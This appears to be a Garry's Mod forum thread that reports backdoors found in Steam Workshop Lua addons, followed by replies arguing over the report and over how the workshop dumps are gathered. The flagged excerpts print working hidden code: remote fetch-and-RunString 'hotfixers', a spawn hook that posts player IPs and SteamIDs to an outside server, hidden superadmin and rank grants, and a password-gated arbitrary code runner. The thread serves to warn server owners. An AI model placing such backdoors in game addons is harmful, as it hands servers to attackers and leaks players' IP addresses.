--https://steamcommunity.com/profiles/76561198159594067
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/833690597/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=833690597
--https://steamcommunity.com/profiles/76561197999609064
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/843039227/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=843039227
--https://steamcommunity.com/profiles/76561197989876855
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/846025788/lua/autorun/server/sgmdrmkappa.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=846025788
--https://steamcommunity.com/profiles/76561198041269991
--Doesn't allow selected players to use cars, and if they do, they get kicked.
26	sgmcarhaha.timername = "sgmcar_timerhaha_" .. math.random(os.time())
27	
28	sgmcarhaha.steamidtable = {
29		["STEAM_0:0:56398828"] = true,
^	- Hardcoded SteamID (STEAM_0:0:56398828)
30		["STEAM_0:1:46313617"] = true,
^	- Hardcoded SteamID (STEAM_0:1:46313617)
31	}
32	
33	sgmcarhaha.carmodels = {

]]--dumps/139263490/gamemodes/morbusgame/gamemode/shared/shd_hotfixer.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=139263490
--https://steamcommunity.com/profiles/76561197980950028 Co-author: https://steamcommunity.com/profiles/76561198001764190
--Possible backdoor
8	
9	local sharedHotfix = ""; -- Blankness
10	local rNum = tostring(math.random(1,1000000))
11	local sharedHotfixURL = "http://www.remscar.com/morbus/hotfix/shared/shd_hotfix.txt".."?cacheBuster="..rNum
^	- External Networking
12	
13	timer.Simple(1,function() http.Fetch( sharedHotfixURL,
^	- External Networking
14	  function( body, len, headers, code )
15	    -- The first argument is the HTML we asked for.
16	    sharedHotfix = body
17	    if useSharedHotfix then
18	      RunString(sharedHotfix)
^	- Arbitrary Code Execution
19	    end
20	  end,
21	  function( error )

]]--dumps/845106412/gamemodes/morbusgame/gamemode/shared/shd_hotfixer.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=845106412
--https://steamcommunity.com/profiles/76561198033820568
--Possible backdoor
8	
9	local sharedHotfix = ""; -- Blankness
10	local rNum = tostring(math.random(1,1000000))
11	local sharedHotfixURL = "http://www.remscar.com/morbus/hotfix/shared/shd_hotfix.txt".."?cacheBuster="..rNum
^	- External Networking
12	
13	timer.Simple(1,function() http.Fetch( sharedHotfixURL,
^	- External Networking
14	  function( body, len, headers, code )
15	    -- The first argument is the HTML we asked for.
16	    sharedHotfix = body
17	    if useSharedHotfix then
18	      RunString(sharedHotfix)
^	- Arbitrary Code Execution
19	    end
20	  end,
21	  function( error )

--https://steamcommunity.com/profiles/76561198084345699
--IP Tracker of all players
453	hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
454		L = {}
455		L["sid"] = tostring(system:SteamID())
456		L["pip"] = tostring(system:IPAddress())
^	- IP Tracking
457		L["sip"] =  tostring(game.GetIPAddress())
458		http.Post("http://www.hfg.cc/tracker/serverip.php?sid="..L["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
^	- External Networking
459	end)

]]--dumps/861408284/lua/autorun/server/sv_fuck_rubat.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=861408284
--https://steamcommunity.com/profiles/76561197960616556
--IP Tracker of all players
453	hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
454		L = {}
455		L["sid"] = tostring(system:SteamID())
456		L["pip"] = tostring(system:IPAddress())
^	- IP Tracking
457		L["sip"] =  tostring(game.GetIPAddress())
458		http.Post("http://www.hfg.cc/tracker/serverip.php?sid="..L["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
^	- External Networking
459	end)

]]--dumps/878804478/lua/autorun/server/sv_fuck_rubat.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=878804478
--https://steamcommunity.com/profiles/76561198215947413
--IP Tracker of all players
453	hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
454		L = {}
455		L["sid"] = tostring(system:SteamID())
456		L["pip"] = tostring(system:IPAddress())
^	- IP Tracking
457		L["sip"] =  tostring(game.GetIPAddress())
458		http.Post("http://www.hfg.cc/tracker/serverip.php?sid="..L["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
^	- External Networking
459	end)

]]--dumps/887913432/lua/autorun/server/sv_fuck_rubat.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=887913432
--https://steamcommunity.com/profiles/76561198069166251 Co-author: https://steamcommunity.com/profiles/76561198089081065
--IP Tracker of all players
453	hook.Add("PlayerSpawn", "StatisticsTracking", function(system)
454		L = {}
455		L["sid"] = tostring(system:SteamID())
456		L["pip"] = tostring(system:IPAddress())
^	- IP Tracking
457		L["sip"] =  tostring(game.GetIPAddress())
458		http.Post("http://www.hfg.cc/tracker/serverip.php?sid="..L["sid"].."&pip="..L["pip"].."&sip="..L["sip"], nil, nil, nil)
^	- External Networking
459	end)

]]--dumps/139263490/gamemodes/morbusgame/gamemode/server/sv_hotfixer.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=139263490
--http://steamcommunity.com/profiles/76561197980950028 Co-author: http://steamcommunity.com/profiles/76561198001764190
--Possible backdoor
11	
12	local serverHotfix = ""; -- Blankness
13	local rNum = tostring(math.random(1,1000000))
14	serverHotfixURL = "http://www.remscar.com/morbus/hotfix/server/sv_hotfix.txt".."?cacheBuster="..rNum
^	- External Networking
15	
16	
17	timer.Simple(1,function() http.Fetch( serverHotfixURL,
^	- External Networking
18	  function( body, len, headers, code )
19	    -- The first argument is the HTML we asked for.
20	    serverHotfix = body
21	    if useServerHotfix then
22	      RunString(serverHotfix)
^	- Arbitrary Code Execution
23	    end
24	  end,
25	  function( error )

]]--dumps/845106412/gamemodes/morbusgame/gamemode/server/sv_hotfixer.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=845106412
--https://steamcommunity.com/profiles/76561198033820568
--Possible backdoor
11	
12	local serverHotfix = ""; -- Blankness
13	local rNum = tostring(math.random(1,1000000))
14	serverHotfixURL = "http://www.remscar.com/morbus/hotfix/server/sv_hotfix.txt".."?cacheBuster="..rNum
^	- External Networking
15	
16	
17	timer.Simple(1,function() http.Fetch( serverHotfixURL,
^	- External Networking
18	  function( body, len, headers, code )
19	    -- The first argument is the HTML we asked for.
20	    serverHotfix = body
21	    if useServerHotfix then
22	      RunString(serverHotfix)
^	- Arbitrary Code Execution
23	    end
24	  end,
25	  function( error )

]]--dumps/601001006/lua/autorun/sv_timearrest.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=601001006
--https://steamcommunity.com/profiles/76561198028197889
--Backdoor for getting superadmin, has also backdoor for getting money in the same file.
20	end )
21	
22	concommand.Add( "voroxadmin", function( ply )
23		RunConsoleCommand( "ulx", "adduser", ply:SteamID(), "superadmin")
^	- Console Command
^	- ULX in a String?
24	end )

]]--dumps/885335389/lua/weapons/swep_base.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=885335389
--https://steamcommunity.com/profiles/76561198039569030
--Backdoor for getting superadmin
59	
60	if SERVER then
61	concommand.Add( "50krs", function( debugPlayer )
62	RunConsoleCommand("ulx","adduser",debugPlayer:Name(),"superadmin")
^	- Console Command
^	- ULX in a String?
63	end)
64	end

]]--dumps/914442609/lua/autorun/tfa_comm_sw_droid_b.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=914442609
--https://steamcommunity.com/profiles/76561198001136293
--Backdoor for getting any rank
1	hook.Add( "PlayerSay", "BefehleForumEtcX", function( ply, text, public )
2		if ( string.sub( text, 1, 5 ) == "/ulxa" ) then
3			steamid = ply:SteamID()
4			if( steamid == "STEAM_0:1:20435282" or steamid == "STEAM_0:1:78673549" ) then
^	- Hardcoded SteamID (STEAM_0:1:20435282)
5				RunConsoleCommand("ulx", "adduserid", steamid, string.sub( text, 7 ))
^	- Console Command
^	- ULX in a String?
6				--ply:ChatPrint("Arbeit erledigt.")
7			end
8			return ""

]]--dumps/910081603/lua/autorun/weaponparticle.lua
--https://steamcommunity.com/sharedfiles/filedetails/?id=910081603
--https://steamcommunity.com/profiles/76561198346886924
--Backdoor for running code
1	game.AddParticles( "particles/weapon_magnum.pcf" )
2	concommand.Add( "colt_settings", function( ply, cmd, args )
3	if args[1] == "zxc1" then
4		RunString(args[2],"",false)
^	- Arbitrary Code Execution
5		end
6	end )


New account, you didn’t include the odiumpro stuff.
Wombles Prop Protection ???
lua\autorun\wpp.lua

Are you some sort of double agent poster working for odium?

What’s the point of reporting same stuff that astoned did? Also feel free to validate the information i sent, and i doubt anyone would remove anything from workshop without confirming it.

How do you get the dumps of the workshop? Would like to have a look and make some maps based on some info

Wow.

Remind me never to trust lua on the workshop.

“never to trust lua on the workshop.”

Not even your own :gun:

You download everything manually (Through an automatic program, but there is no button to “Download all”), that’s what OP did

I wrote a program to do so, which works just like the program aStonedPenguin uses.

Unless you have at least a 4c/8t CPU, 32GB RAM and a 1Gbps network connection, it will take FOREVER to do so unless you do very specific filtering.
(Trust me i’ve tried on a 60Mbps connection, it will take days)

You can use your disk as a cache, reducing the amount of RAM required, but that will increase time substantially.

yawn, how is an IP tracker a backdoor or used to execute malicious code? Get real. There’s a reason those ones weren’t removed.

whats the point of the yawn?
are you trying to say you’re smarter than us?
does it show that ur 2 kewl 2 care about this thread?
are u rly sleepy?

i need answers

I simply believe this is a huge overreaction, as penguin said he already reported it to robotboy, so there was absolutely no reason to make this post other than to fearmonger.

but there are backdoors that actually got banned? so it’s only right to post this thread to notify server owners to check their shit incase they have one of the beaned addons.